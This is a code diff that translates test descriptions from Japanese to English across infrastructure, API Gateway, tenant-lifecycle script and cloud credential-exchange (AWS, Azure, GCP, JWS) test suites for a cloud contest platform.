+  it("deprovision script should unpack source.zip before sourcing the runtime helper", () => {
     const script = readRepoFile("scripts/deprovision-tenant.sh");
     const unzipIndex = script.indexOf('unzip -o "$CDK_SOURCE_NAME"');
     const sourceIndex = script.indexOf("source ./scripts/lib/install-node.sh");
@@ -54,7 +54,7 @@ describe("tenant lifecycle scripts", () => {
     expect(sourceIndex).toBeGreaterThan(unzipIndex);
   });
 
-  it(".nvmrc は Node 22 以上を指定すべき", () => {
+  it("should pin .nvmrc to Node 22 or higher", () => {
     const nodeMajor = Number.parseInt(
       readRepoFile(".nvmrc").trim().replace(/^v/, "").split(".")[0] ?? "",
       10,
@@ -66,7 +66,7 @@ describe("tenant lifecycle scripts", () => {
   // Issue #1053: hosting を ProblemDeployBackendStack に移管したため、 update-tenant.sh / provision-tenant.sh
   // は `CDK_PARAM_COMPETITOR_BOOTSTRAP_TEMPLATE_URL` を env で渡さない (= cross-stack ref に置換)。
   // 旧 env-var 経路が誤って復活しないよう regression pin する。
-  it("update-tenant.sh は CDK_PARAM_COMPETITOR_BOOTSTRAP_TEMPLATE_URL を env-var inject しないべき (#1053)", () => {
+  it("update-tenant.sh should not env-var inject CDK_PARAM_COMPETITOR_BOOTSTRAP_TEMPLATE_URL (#1053)", () => {
     const script = readRepoFile("scripts/update-tenant.sh");
     expect(script).not.toMatch(/export\s+CDK_PARAM_COMPETITOR_BOOTSTRAP_TEMPLATE_URL=/);
   });
@@ -76,22 +76,22 @@ describe("tenant lifecycle scripts", () => {
   // に倒れて `problemDeployBackendStack.participantPortalUrl` が undefined になり、 pooled
   // stack の runtime-config に `participantPortalUrl` が **silent に消える**。 install.sh と
   // 同じ default を CodeBuild にも入れて regression を防ぐ。
-  it("update-tenant.sh は CDK_PARAM_ENABLE_PARTICIPANT_PORTAL=true を export すべき", () => {
+  it("update-tenant.sh should export CDK_PARAM_ENABLE_PARTICIPANT_PORTAL=true", () => {
     const script = readRepoFile("scripts/update-tenant.sh");
     expect(script).toMatch(/export\s+CDK_PARAM_ENABLE_PARTICIPANT_PORTAL=["']true["']/);
   });
 
-  it("provision-tenant.sh は CDK_PARAM_ENABLE_PARTICIPANT_PORTAL=true を export すべき", () => {
+  it("provision-tenant.sh should export CDK_PARAM_ENABLE_PARTICIPANT_PORTAL=true", () => {
     const script = readRepoFile("scripts/provision-tenant.sh");
     expect(script).toMatch(/export\s+CDK_PARAM_ENABLE_PARTICIPANT_PORTAL=["']true["']/);
   });
 
-  it("install.sh も CDK_PARAM_ENABLE_PARTICIPANT_PORTAL=true を export すべき (= 3 script 同期)", () => {
+  it("install.sh should also export CDK_PARAM_ENABLE_PARTICIPANT_PORTAL=true (3-script sync)", () => {
     const script = readRepoFile("scripts/install.sh");
     expect(script).toMatch(/export\s+CDK_PARAM_ENABLE_PARTICIPANT_PORTAL=["']true["']/);
   });
 
-  it("mise の Node/Bun runtime は repo の正本 version と一致すべき", () => {
+  it("mise Node/Bun runtimes should match the repo's canonical versions", () => {
     const packageJson = JSON.parse(readRepoFile("package.json")) as {
       packageManager?: string;
     };
@@ -109,7 +109,7 @@ describe("tenant lifecycle scripts", () => {
   //   2. Stack ... is in UPDATE_IN_PROGRESS state and can not be updated
   // 実 deploy 環境 (2026-05-18 CodeBuild logs) で 3 連続 fail を観測したので regression
   // pin する。
-  it("update-tenant.sh は cdk deploy 直前に wait_for_stack_idle で stack を poll すべき", () => {
+  it("update-tenant.sh should poll the stack via wait_for_stack_idle right before cdk deploy", () => {
     const script = readRepoFile("scripts/update-tenant.sh");
     expect(script).toContain("wait_for_stack_idle()");
     expect(script).toContain('wait_for_stack_idle "${STACK_NAME}"');
@@ -124,7 +124,7 @@ describe("tenant lifecycle scripts", () => {
   // 可能性がある。 provision-tenant.sh が `[[ $TIER == "PLATINUM" ]]` で大文字比較する前に
   // 必ず uppercase 正規化する。 忘れると小文字 "platinum" が silo 分岐に入らず pooled に
   // 倒れて UI で「Open ↗ (pooled)」 表示になる (= 2026-05-18 testsilo regression)。
-  it("provision-tenant.sh は TIER を大文字に正規化してから PLATINUM 判定すべき", () => {
+  it("provision-tenant.sh should normalize TIER to uppercase before judging PLATINUM", () => {
     const script = readRepoFile("scripts/provision-tenant.sh");
     // TIER 環境変数が tr で大文字化されてから export されること
     expect(script).toMatch(/export TIER=\$\(echo "\$tier" \| tr '\[:lower:\]' '\[:upper:\]'\)/);
@@ -140,7 +140,7 @@ describe("tenant lifecycle scripts", () => {
 
   // Issue #1053: 初回 provisioning でも env-var inject は不要 (= ProblemDeployBackendStack
   // から cross-stack ref で URL が引かれる)。 旧経路が誤って復活しないよう regression pin。
-  it("provision-tenant.sh は CDK_PARAM_COMPETITOR_BOOTSTRAP_TEMPLATE_URL を env-var inject しないべき (#1053)", () => {
+  it("provision-tenant.sh should not env-var inject CDK_PARAM_COMPETITOR_BOOTSTRAP_TEMPLATE_URL (#1053)", () => {
     const script = readRepoFile("scripts/provision-tenant.sh");
     expect(script).not.toMatch(/export\s+CDK_PARAM_COMPETITOR_BOOTSTRAP_TEMPLATE_URL=/);
   });

--- a/infrastructure/test/tenant-status-reconciler/status-policy.test.ts
+++ b/infrastructure/test/tenant-status-reconciler/status-policy.test.ts
@@ -4,7 +4,7 @@ import { decideReconcile } from "../../lib/tenant-status-reconciler/status-polic
 const NOW = Date.parse("2026-05-13T22:00:00.000Z");
 
 describe("decideReconcile", () => {
-  it('status が "In progress" でない場合は skip すべき (= 既に Complete/Failed/Deleted は触らない)', () => {
+  it('should skip when status is not "In progress" (don\'t touch already Complete/Failed/Deleted)', () => {
     expect(
       decideReconcile({
         tenantStatus: "Complete",
@@ -33,7 +33,7 @@ describe("decideReconcile", () => {
     expect(out.action).toBe("complete");
   });
 
-  it('"IN_PROGRESS" (大文字) でも同じく判定すべき (= case-insensitive)', () => {
+  it('should classify "IN_PROGRESS" (uppercase) the same way (case-insensitive)', () => {
     expect(
       decideReconcile({
         tenantStatus: "IN_PROGRESS",
@@ -44,7 +44,7 @@ describe("decideReconcile", () => {
     ).toBe("complete");
   });
 
-  it('"Provisioning" (SBT v0.3.10 系) でも同じく判定すべき', () => {
+  it('should classify "Provisioning" (SBT v0.3.10 lineage) the same way', () => {
     expect(
       decideReconcile({
         tenantStatus: "Provisioning",

--- a/infrastructure/test/tenant-status-reconciler/tenant-status-reconciler.test.ts
+++ b/infrastructure/test/tenant-status-reconciler/tenant-status-reconciler.test.ts
@@ -20,13 +20,13 @@ function synth() {
 }
 
 describe("TenantStatusReconciler", () => {
-  it("Lambda + EventBridge Rule を 1 セット作るべき", () => {
+  it("should create 1 set of Lambda + EventBridge Rule", () => {
     const { template } = synth();
     template.resourceCountIs("AWS::Lambda::Function", 1);
     template.resourceCountIs("AWS::Events::Rule", 1);
   });
 
-  it("Schedule は 2 分周期がデフォルトであるべき", () => {
+  it("Schedule should default to a 2-minute interval", () => {
     const { template } = synth();
     template.hasResourceProperties(
       "AWS::Events::Rule",
@@ -36,7 +36,7 @@ describe("TenantStatusReconciler", () => {
     );
   });
 
-  it("Lambda の environment に TENANT_MAPPING_TABLE_NAME を渡すべき", () => {
+  it("should pass TENANT_MAPPING_TABLE_NAME to the Lambda environment", () => {
     const { template } = synth();
     template.hasResourceProperties(
       "AWS::Lambda::Function",
@@ -50,7 +50,7 @@ describe("TenantStatusReconciler", () => {
     );
   });
 
-  it("Lambda の IAM policy が TenantMappingTable への Scan + UpdateItem を grant すべき", () => {
+  it("Lambda IAM policy should grant Scan + UpdateItem on TenantMappingTable", () => {
     const { template } = synth();
     template.hasResourceProperties(
       "AWS::IAM::Policy",
@@ -66,7 +66,7 @@ describe("TenantStatusReconciler", () => {
     );
   });
 
-  it("scheduleInterval を override できるべき", () => {
+  it("should allow overriding scheduleInterval", () => {
     const app = new cdk.App();
     const stack = new cdk.Stack(app, "T", {
       env: { account: "123456789012", region: "ap-northeast-1" },

--- a/infrastructure/test/tenant-template/api-gateway.test.ts
+++ b/infrastructure/test/tenant-template/api-gateway.test.ts
@@ -74,11 +74,11 @@ describe("tenant ApiGateway", () => {
     return Object.values(resources)[0];
   }
 
-  it("/deployments resource が存在するべき", () => {
+  it("should expose the /deployments resource", () => {
     expect(findResource("deployments")).toBeDefined();
   });
 
-  it("/deployments に GET method が紐づいているべき (= サイドバー「デプロイ履歴」用)", () => {
+  it('should bind a GET method on /deployments (for the sidebar "Deploy history")', () => {
     const deploymentsResource = Object.entries(
       tpl.findResources("AWS::ApiGateway::Resource", { Properties: { PathPart: "deployments" } }),
     )[0]?.[0];
@@ -89,7 +89,7 @@ describe("tenant ApiGateway", () => {
     });
   });
 
-  it("/deployments/{jobId} に GET と DELETE が紐づいているべき", () => {
+  it("should bind GET and DELETE on /deployments/{jobId}", () => {
     const jobIdResource = Object.entries(
       tpl.findResources("AWS::ApiGateway::Resource", { Properties: { PathPart: "{jobId}" } }),
     )[0]?.[0];
@@ -104,7 +104,7 @@ describe("tenant ApiGateway", () => {
     });
   });
 
-  it("/deployments/{jobId}/stack-progress に GET / OPTIONS method が紐づいているべき", () => {
+  it("should bind GET / OPTIONS on /deployments/{jobId}/stack-progress", () => {
     const stackProgressResource = Object.entries(
       tpl.findResources("AWS::ApiGateway::Resource", {
         Properties: { PathPart: "stack-progress" },
@@ -121,12 +121,12 @@ describe("tenant ApiGateway", () => {
     });
   });
 
-  it("/problems/{problemId}/deploy に POST、/problems/{problemId}/deployments に GET が紐づくべき", () => {
+  it("should bind POST on /problems/{problemId}/deploy and GET on /problems/{problemId}/deployments", () => {
     expect(findResource("deploy")).toBeDefined();
     expect(findResource("{problemId}")).toBeDefined();
   });
 
-  it("/events/{eventId}/notifications resource + POST method が存在するべき (#553)", () => {
+  it("should expose the /events/{eventId}/notifications resource with a POST method (#553)", () => {
     // backend handler `POST /events/:eventId/notifications` (= ADR-006 通知 push) と
     // API Gateway route の配線がセットでないと frontend は "Failed to fetch" になる。
     // #535 と同種の「backend だけ merge、CDK 後追い」 regression を再発させないための pin。
@@ -142,7 +142,7 @@ describe("tenant ApiGateway", () => {
     });
   });
 
-  it("/admin/competitor-accounts と /admin/competitor-accounts/{awsAccountId}/verify を持つべき (Issue #459)", () => {
+  it("should have /admin/competitor-accounts and /admin/competitor-accounts/{awsAccountId}/verify (Issue #459)", () => {
     // Issue #459 / ADR-002 Phase 2.1: Competitor Accounts CRUD + verify
     expect(findResource("admin")).toBeDefined();
     expect(findResource("competitor-accounts")).toBeDefined();
@@ -165,7 +165,7 @@ describe("tenant ApiGateway", () => {
     });
   });
 
-  it("/admin/competitor-accounts/{awsAccountId}/rotate-external-id POST を持つべき (Issue #596)", () => {
+  it("should have POST /admin/competitor-accounts/{awsAccountId}/rotate-external-id (Issue #596)", () => {
     // Issue #596 / ADR-002 Phase 3.1: ExternalId rotation route
     expect(findResource("rotate-external-id")).toBeDefined();
     const rotateResourceId = Object.entries(

--- a/infrastructure/test/tenkacloud-lite-bin.test.ts
+++ b/infrastructure/test/tenkacloud-lite-bin.test.ts
@@ -71,7 +71,7 @@ function buildLiteApp(): cdk.App {
 }
 
 describe("bin/tenkacloud-lite.ts (#778 ADR-016 Phase 5)", () => {
-  it("`tenkacloud-lite-problem-deploy` + `tenkacloud-lite` の 2 stack だけが synth されるべき", () => {
+  it("should synth only the 2 stacks `tenkacloud-lite-problem-deploy` + `tenkacloud-lite`", () => {
     const app = buildLiteApp();
     const assembly = app.synth();
     const liteStacks = assembly.stacks.filter((s) => s.stackName.startsWith("tenkacloud-"));
@@ -79,7 +79,7 @@ describe("bin/tenkacloud-lite.ts (#778 ADR-016 Phase 5)", () => {
     expect(names).toEqual(["tenkacloud-lite", "tenkacloud-lite-problem-deploy"]);
   }, 30_000);
 
-  it("ProblemDeployBackend (Lite mode) は eventBusArn 省略で local EventBus を 1 つ作るべき", () => {
+  it("ProblemDeployBackend (Lite mode) should create 1 local EventBus when eventBusArn is omitted", () => {
     const app = buildLiteApp();
     const problemDeployStack = app.node
       .findAll()
@@ -89,7 +89,7 @@ describe("bin/tenkacloud-lite.ts (#778 ADR-016 Phase 5)", () => {
     template.resourceCountIs("AWS::Events::EventBus", 1);
   }, 30_000);
 
-  it("Lite stack 側は AppPlaneCore (= UserPool + REST API + CloudFront) を 1 セット作るべき", () => {
+  it("Lite stack side should create 1 set of AppPlaneCore (UserPool + REST API + CloudFront)", () => {
     const app = buildLiteApp();
     const liteStack = app.node
       .findAll()
@@ -101,7 +101,7 @@ describe("bin/tenkacloud-lite.ts (#778 ADR-016 Phase 5)", () => {
     template.resourceCountIs("AWS::CloudFront::Distribution", 1);
   }, 30_000);
 
-  it("Lite stack は ControlPlane / Tenant-Pipeline / Bootstrap / AdminConsoleInsight を持ち込まないべき", () => {
+  it("Lite stack should not include ControlPlane / Tenant-Pipeline / Bootstrap / AdminConsoleInsight", () => {
     const app = buildLiteApp();
     const assembly = app.synth();
     const stackNames = assembly.stacks.map((s) => s.stackName);
@@ -120,7 +120,7 @@ describe("bin/tenkacloud-lite.ts (#778 ADR-016 Phase 5)", () => {
     }
   }, 30_000);
 
-  it("Lite stack は ProblemDeploy stack に明示的に depend するべき (= cross-stack Lambda ref)", () => {
+  it("Lite stack should explicitly depend on the ProblemDeploy stack (cross-stack Lambda ref)", () => {
     const app = buildLiteApp();
     const liteStack = app.node
       .findAll()

--- a/infrastructure/test/tenkacloud-lite/tenkacloud-lite-stack.test.ts
+++ b/infrastructure/test/tenkacloud-lite/tenkacloud-lite-stack.test.ts
@@ -49,24 +49,24 @@ function synth(): Template {
 }
 
 describe("TenkaCloudLiteStack (#778 ADR-016 Phase 3)", () => {
-  it("Cognito UserPool / UserPoolClient / UserPoolDomain を 1 セット作るべき (= AppPlaneCore 由来)", () => {
+  it("should create 1 set of Cognito UserPool / UserPoolClient / UserPoolDomain (from AppPlaneCore)", () => {
     const template = synth();
     template.resourceCountIs("AWS::Cognito::UserPool", 1);
     template.resourceCountIs("AWS::Cognito::UserPoolClient", 1);
     template.resourceCountIs("AWS::Cognito::UserPoolDomain", 1);
   });
 
-  it("Tenant REST API Gateway を 1 つ作るべき", () => {
+  it("should create 1 Tenant REST API Gateway", () => {
     const template = synth();
     template.resourceCountIs("AWS::ApiGateway::RestApi", 1);
   });
 
-  it("ApplicationAdminConsoleHosting (= CloudFront) を 1 つ作るべき", () => {
+  it("should create 1 ApplicationAdminConsoleHosting (= CloudFront)", () => {
     const template = synth();
     template.resourceCountIs("AWS::CloudFront::Distribution", 1);
   });
 
-  it("CfnOutput に Application Admin Console URL / Cognito Domain / Tenant API / TenantId を含むべき", () => {
+  it("should include Application Admin Console URL / Cognito Domain / Tenant API / TenantId in CfnOutput", () => {
     const template = synth();
     template.hasOutput("ApplicationAdminConsoleUrl", Match.objectLike({}));
     template.hasOutput("CognitoDomainUrl", Match.objectLike({}));
@@ -74,7 +74,7 @@ describe("TenkaCloudLiteStack (#778 ADR-016 Phase 3)", () => {
     template.hasOutput("TenantId", Match.objectLike({ Value: "local" }));
   });
 
-  it("Cognito UserPool domain prefix は tenantId=local を埋めるべき (= region globally unique 性)", () => {
+  it("Cognito UserPool domain prefix should embed tenantId=local (region-global uniqueness)", () => {
     const template = synth();
     template.hasResourceProperties(
       "AWS::Cognito::UserPoolDomain",
@@ -84,7 +84,7 @@ describe("TenkaCloudLiteStack (#778 ADR-016 Phase 3)", () => {
     );
   });
 
-  it("SBT / pipeline 系 resource (TenantMappingTable / SaaSPipeline) を持ち込まないべき", () => {
+  it("should not include SBT / pipeline resources (TenantMappingTable / SaaSPipeline)", () => {
     const template = synth();
     // Lite mode は SBT TenantMappingTable を参照しないので、 DynamoDB Table を作らない。
     template.resourceCountIs("AWS::DynamoDB::Table", 0);
@@ -92,7 +92,7 @@ describe("TenkaCloudLiteStack (#778 ADR-016 Phase 3)", () => {
     template.resourceCountIs("AWS::CodePipeline::Pipeline", 0);
   });
 
-  it("public な API key (Usage Plan / API Key) は dormant な dummy 設定で立つべき (= Lite では使わない)", () => {
+  it("public API keys (Usage Plan / API Key) should be provisioned in a dormant dummy configuration (unused in Lite)", () => {
     const template = synth();
     // Usage Plan + API Key は AppPlaneCore (= ApiGateway construct) が作るので、 Lite でも
     // resource は出る。 ただし dummy SSM lookup なので runtime で実 key は引かれない。

--- a/packages/trust-bridge/test/audit.test.ts
+++ b/packages/trust-bridge/test/audit.test.ts
@@ -33,7 +33,7 @@ function makeIntent(): CloudActionIntent {
 describe("buildAuditRecord (#795 Phase 1)", () => {
   const fixedNow = () => new Date("2026-05-15T19:30:00.000Z");
 
-  it("verify 成功 + override 無しなら decision=allow で intent の domain field を埋めるべき", () => {
+  it("should set decision=allow and populate domain fields from the intent on verify success without override", () => {
     const intent = makeIntent();
     const record = buildAuditRecord({
       outcome: { ok: true, intent: brandVerified(intent) },
@@ -57,7 +57,7 @@ describe("buildAuditRecord (#795 Phase 1)", () => {
     });
   });
 
-  it("override で deny を指定したら decision が deny になり denialReason も載るべき", () => {
+  it("should set decision to deny and include denialReason when override specifies deny", () => {
     const intent = makeIntent();
     const record = buildAuditRecord({
       outcome: { ok: true, intent: brandVerified(intent) },
@@ -69,7 +69,7 @@ describe("buildAuditRecord (#795 Phase 1)", () => {
     expect(record.denialReason).toBe("policy:scope-too-broad");
   });
 
-  it("verify 失敗系は decision=deny + denialReason=reason で unknown を埋めるべき", () => {
+  it("should record verify failures as decision=deny + denialReason=reason and fill missing fields with unknown", () => {
     const record = buildAuditRecord({
       outcome: { ok: false, reason: "expired" },
       now: fixedNow,
@@ -85,7 +85,7 @@ describe("buildAuditRecord (#795 Phase 1)", () => {
     });
   });
 
-  it("schema 無効系も deny + denialReason=schema-invalid で audit に残るべき", () => {
+  it("should also record schema-invalid cases as deny + denialReason=schema-invalid in audit", () => {
     const record = buildAuditRecord({
       outcome: { ok: false, reason: "schema-invalid", details: ["constraints.ttlSeconds"] },
       now: fixedNow,
@@ -94,7 +94,7 @@ describe("buildAuditRecord (#795 Phase 1)", () => {
     expect(record.denialReason).toBe("schema-invalid");
   });
 
-  it("source の optional field が無い intent では audit にも入らないべき (= clean serialization)", () => {
+  it("should omit source optional fields from audit when the intent lacks them (= clean serialization)", () => {
     const intent = makeIntent();
     const lean: CloudActionIntent = {
       ...intent,

--- a/packages/trust-bridge/test/aws-assume-role.test.ts
+++ b/packages/trust-bridge/test/aws-assume-role.test.ts
@@ -65,7 +65,7 @@ function makeStub(
 }
 
 describe("AwsAssumeRoleExchange (#795 Phase 2)", () => {
-  it("provider が aws でない intent では provider-mismatch を投げるべき", async () => {
+  it("should throw provider-mismatch for an intent whose provider is not aws", async () => {
     const ex = new AwsAssumeRoleExchange({ sts: makeStub() });
     const intent = makeIntent({
       target: { provider: "gcp", providerAccountRef: "my-project" },
@@ -75,21 +75,21 @@ describe("AwsAssumeRoleExchange (#795 Phase 2)", () => {
     ).rejects.toMatchObject({ reason: "provider-mismatch" });
   });
 
-  it("context.roleArn が無いと context-missing を投げるべき", async () => {
+  it("should throw context-missing when context.roleArn is absent", async () => {
     const ex = new AwsAssumeRoleExchange({ sts: makeStub() });
     await expect(
       ex.exchange(makeIntent(), { externalId: "ext-1" } as Record<string, unknown>),
     ).rejects.toMatchObject({ reason: "context-missing" });
   });
 
-  it("context.externalId が無いと context-missing を投げるべき (= ADR-002 必須化)", async () => {
+  it("should throw context-missing when context.externalId is absent (= mandated by ADR-002)", async () => {
     const ex = new AwsAssumeRoleExchange({ sts: makeStub() });
     await expect(
       ex.exchange(makeIntent(), { roleArn: "arn:aws:iam::1:role/x" } as Record<string, unknown>),
     ).rejects.toMatchObject({ reason: "context-missing" });
   });
 
-  it("ttlSeconds が STS 最小 900 未満なら ttl-exceeded-provider-limit を投げるべき", async () => {
+  it("should throw ttl-exceeded-provider-limit when ttlSeconds is below the STS minimum of 900", async () => {
     const ex = new AwsAssumeRoleExchange({ sts: makeStub() });
     const intent = makeIntent();
     const short: CloudActionIntent = {
@@ -104,7 +104,7 @@ describe("AwsAssumeRoleExchange (#795 Phase 2)", () => {
     ).rejects.toMatchObject({ reason: "ttl-exceeded-provider-limit" });
   });
 
-  it("STS が throw したら provider-api-error に wrap するべき (= underlying 保持)", async () => {
+  it("should wrap an STS throw into provider-api-error (= preserving the underlying error)", async () => {
     const failingSts: StsAssumeRoleClient = {
       assumeRole: async () => {
         throw new Error("STS unreachable");
@@ -125,7 +125,7 @@ describe("AwsAssumeRoleExchange (#795 Phase 2)", () => {
     }
   });
 
-  it("成功 path で AssumeRoleCommand input に DurationSeconds / ExternalId / Policy / Tags を正しく載せるべき", async () => {
+  it("should populate AssumeRoleCommand input with DurationSeconds / ExternalId / Policy / Tags on the success path", async () => {
     let captured: AssumeRoleInput | undefined;
     const sts = makeStub({}, (input) => {
       captured = input;
@@ -151,7 +151,7 @@ describe("AwsAssumeRoleExchange (#795 Phase 2)", () => {
     expect(result.externalId).toBe("ext-secret");
   });
 
-  it("RoleSessionName は default で intent claim から組み立て、 64 文字 cap されるべき", async () => {
+  it("should build RoleSessionName from intent claims by default and cap it at 64 characters", async () => {
     let captured: AssumeRoleInput | undefined;
     const sts = makeStub({}, (input) => {
       captured = input;
@@ -170,7 +170,7 @@ describe("AwsAssumeRoleExchange (#795 Phase 2)", () => {
     expect(captured?.RoleSessionName.length).toBeLessThanOrEqual(64);
   });
 
-  it("requestedScopes が空なら Policy 省略されるべき (= default = role policy のみ)", async () => {
+  it("should omit Policy when requestedScopes is empty (= default falls back to the role policy alone)", async () => {
     let captured: AssumeRoleInput | undefined;
     const sts = makeStub({}, (input) => {
       captured = input;
@@ -188,7 +188,7 @@ describe("AwsAssumeRoleExchange (#795 Phase 2)", () => {
     expect(captured?.Policy).toBeUndefined();
   });
 
-  it("Expiration が string で返ってきても ISO に正規化されるべき", async () => {
+  it("should normalize Expiration to ISO even when returned as a string", async () => {
     const sts: StsAssumeRoleClient = {
       assumeRole: async () => ({
         Credentials: {

--- a/packages/trust-bridge/test/azure-federated-credential.test.ts
+++ b/packages/trust-bridge/test/azure-federated-credential.test.ts
@@ -47,7 +47,7 @@ function makeStub(capture?: (input: AzureTokenExchangeInput) => void): AzureToke
 }
 
 describe("AzureFederatedCredentialExchange (#795 Phase 4 prototype)", () => {
-  it("provider が azure でない intent では provider-mismatch を投げるべき", async () => {
+  it("should throw provider-mismatch for an intent whose provider is not azure", async () => {
     const ex = new AzureFederatedCredentialExchange({
       tokenClient: makeStub(),
       toClientAssertion: () => "jwt",
@@ -64,7 +64,7 @@ describe("AzureFederatedCredentialExchange (#795 Phase 4 prototype)", () => {
     ).rejects.toMatchObject({ reason: "provider-mismatch" });
   });
 
-  it("azureTenantId が無いと context-missing を投げるべき", async () => {
+  it("should throw context-missing when azureTenantId is absent", async () => {
     const ex = new AzureFederatedCredentialExchange({
       tokenClient: makeStub(),
       toClientAssertion: () => "jwt",
@@ -77,7 +77,7 @@ describe("AzureFederatedCredentialExchange (#795 Phase 4 prototype)", () => {
     ).rejects.toMatchObject({ reason: "context-missing" });
   });
 
-  it("clientId / scope が無くても context-missing を投げるべき", async () => {
+  it("should also throw context-missing when clientId or scope is absent", async () => {
     const ex = new AzureFederatedCredentialExchange({
       tokenClient: makeStub(),
       toClientAssertion: () => "jwt",
@@ -98,7 +98,7 @@ describe("AzureFederatedCredentialExchange (#795 Phase 4 prototype)", () => {
     ).rejects.toMatchObject({ reason: "context-missing" });
   });
 
-  it("成功 path で AzureAD endpoint に client_assertion / scope を渡し expires_in を ISO に正規化すべき", async () => {
+  it("should pass client_assertion / scope to the AzureAD endpoint and normalize expires_in to ISO on the success path", async () => {
     let captured: AzureTokenExchangeInput | undefined;
     const fixedNow = new Date("2026-05-15T22:00:00.000Z");
     const ex = new AzureFederatedCredentialExchange({
@@ -126,7 +126,7 @@ describe("AzureFederatedCredentialExchange (#795 Phase 4 prototype)", () => {
     expect(result.forRequestId).toBe("req-azure-1");
   });
 
-  it("Azure AD endpoint が throw したら provider-api-error に wrap するべき", async () => {
+  it("should wrap an Azure AD endpoint throw into provider-api-error", async () => {
     const ex = new AzureFederatedCredentialExchange({
       tokenClient: {
         exchangeAssertion: async () => {

--- a/packages/trust-bridge/test/gcp-workload-identity.test.ts
+++ b/packages/trust-bridge/test/gcp-workload-identity.test.ts
@@ -54,7 +54,7 @@ function makeStubClient(captures?: {
 }
 
 describe("GcpWorkloadIdentityFederationExchange (#795 Phase 4 prototype)", () => {
-  it("provider が gcp でない intent では provider-mismatch を投げるべき", async () => {
+  it("should throw provider-mismatch for an intent whose provider is not gcp", async () => {
     const ex = new GcpWorkloadIdentityFederationExchange({
       stsClient: makeStubClient(),
       toSubjectToken: () => "jwt-placeholder",
@@ -71,7 +71,7 @@ describe("GcpWorkloadIdentityFederationExchange (#795 Phase 4 prototype)", () =>
     ).rejects.toMatchObject({ reason: "provider-mismatch" });
   });
 
-  it("wifAudience が無いと context-missing を投げるべき", async () => {
+  it("should throw context-missing when wifAudience is absent", async () => {
     const ex = new GcpWorkloadIdentityFederationExchange({
       stsClient: makeStubClient(),
       toSubjectToken: () => "jwt",
@@ -84,7 +84,7 @@ describe("GcpWorkloadIdentityFederationExchange (#795 Phase 4 prototype)", () =>
     ).rejects.toMatchObject({ reason: "context-missing" });
   });
 
-  it("oauthScopes が空配列なら context-missing を投げるべき", async () => {
+  it("should throw context-missing when oauthScopes is an empty array", async () => {
     const ex = new GcpWorkloadIdentityFederationExchange({
       stsClient: makeStubClient(),
       toSubjectToken: () => "jwt",
@@ -98,7 +98,7 @@ describe("GcpWorkloadIdentityFederationExchange (#795 Phase 4 prototype)", () =>
     ).rejects.toMatchObject({ reason: "context-missing" });
   });
 
-  it("成功 path で GCP STS → IAM Credentials を順次呼び credential を返すべき", async () => {
+  it("should call GCP STS then IAM Credentials in sequence and return a credential on the success path", async () => {
     let exchangeIn: GcpStsExchangeInput | undefined;
     let generateIn: GenerateServiceAccountTokenInput | undefined;
     const ex = new GcpWorkloadIdentityFederationExchange({
@@ -132,7 +132,7 @@ describe("GcpWorkloadIdentityFederationExchange (#795 Phase 4 prototype)", () =>
     expect(result.forRequestId).toBe("req-gcp-1");
   });
 
-  it("GCP STS が throw したら provider-api-error に wrap するべき", async () => {
+  it("should wrap a GCP STS throw into provider-api-error", async () => {
     const ex = new GcpWorkloadIdentityFederationExchange({
       stsClient: {
         exchangeToken: async () => {
@@ -153,7 +153,7 @@ describe("GcpWorkloadIdentityFederationExchange (#795 Phase 4 prototype)", () =>
     ).rejects.toBeInstanceOf(ExchangeError);
   });
 
-  it("IAM credentials API が throw したら provider-api-error に wrap し federated step は完了済であるべき", async () => {
+  it("should wrap an IAM credentials API throw into provider-api-error after the federated step has completed", async () => {
     let federatedReached = false;
     const ex = new GcpWorkloadIdentityFederationExchange({
       stsClient: {

--- a/packages/trust-bridge/test/jws.test.ts
+++ b/packages/trust-bridge/test/jws.test.ts
@@ -24,7 +24,7 @@ function intent(): CloudActionIntent {
 }
 
 describe("JWS HS256 sign / verify (#795 Phase 1)", () => {
-  it("正しい secret で署名 → 検証が成功し、 元 intent を取り出せるべき", () => {
+  it("should sign with the correct secret, verify successfully, and recover the original intent", () => {
     const secret = randomBytes(32);
     const token = signIntent(intent(), { secret });
     const result = verifySignature(token, { resolveSecret: () => secret });
@@ -35,7 +35,7 @@ describe("JWS HS256 sign / verify (#795 Phase 1)", () => {
     }
   });
 
-  it("token 形式が壊れていたら malformed-token を返すべき", () => {
+  it("should return malformed-token when the token format is broken", () => {
     const result = verifySignature("not.a.token.extra", {
       resolveSecret: () => new Uint8Array(),
     });
@@ -43,7 +43,7 @@ describe("JWS HS256 sign / verify (#795 Phase 1)", () => {
     if (!result.ok) expect(result.reason).toBe("malformed-token");
   });
 
-  it("secret が resolve できなければ secret-not-resolved を返すべき", () => {
+  it("should return secret-not-resolved when the secret cannot be resolved", () => {
     const secret = randomBytes(32);
     const token = signIntent(intent(), { secret });
     const result = verifySignature(token, { resolveSecret: () => undefined });
@@ -51,7 +51,7 @@ describe("JWS HS256 sign / verify (#795 Phase 1)", () => {
     if (!result.ok) expect(result.reason).toBe("secret-not-resolved");
   });
 
-  it("異なる secret で検証すると signature-mismatch を返すべき", () => {
+  it("should return signature-mismatch when verifying with a different secret", () => {
     const signer = randomBytes(32);
     const verifier = randomBytes(32);
     const token = signIntent(intent(), { secret: signer });
@@ -60,7 +60,7 @@ describe("JWS HS256 sign / verify (#795 Phase 1)", () => {
     if (!result.ok) expect(result.reason).toBe("signature-mismatch");
   });
 
-  it("不明 alg の header を持つ token は unknown-algorithm を返すべき", () => {
+  it("should return unknown-algorithm for a token whose header carries an unknown alg", () => {
     const secret = randomBytes(32);
     const token = signIntent(intent(), { secret });
     const [, payload, sig] = token.split(".");
@@ -74,7 +74,7 @@ describe("JWS HS256 sign / verify (#795 Phase 1)", () => {
     if (!result.ok) expect(result.reason).toBe("unknown-algorithm");
   });
 
-  it("kid が options で渡されたら header に乗り、 resolveSecret に渡るべき", () => {
+  it("should put kid from options into the header and pass it to resolveSecret", () => {
     const k1 = randomBytes(32);
     const k2 = randomBytes(32);
     const token = signIntent(intent(), { secret: k1, kid: "key-1" });

--- a/packages/trust-bridge/test/localstack-cloud-adapter.test.ts
+++ b/packages/trust-bridge/test/localstack-cloud-adapter.test.ts
@@ -38,7 +38,7 @@ function makeIntent(overrides: Partial<CloudActionIntent> = {}): VerifiedCloudAc
 }
 
 describe("LocalStackCloudAdapter (#1122)", () => {
-  it("localhost endpoint 付きの AWS 形 credential を返すべき", async () => {
+  it("should return an AWS-shaped credential with a localhost endpoint", async () => {
     const adapter = new LocalStackCloudAdapter({
       endpointUrl: "http://localhost:4566/",
       now: () => new Date("2026-05-15T19:00:00.000Z"),
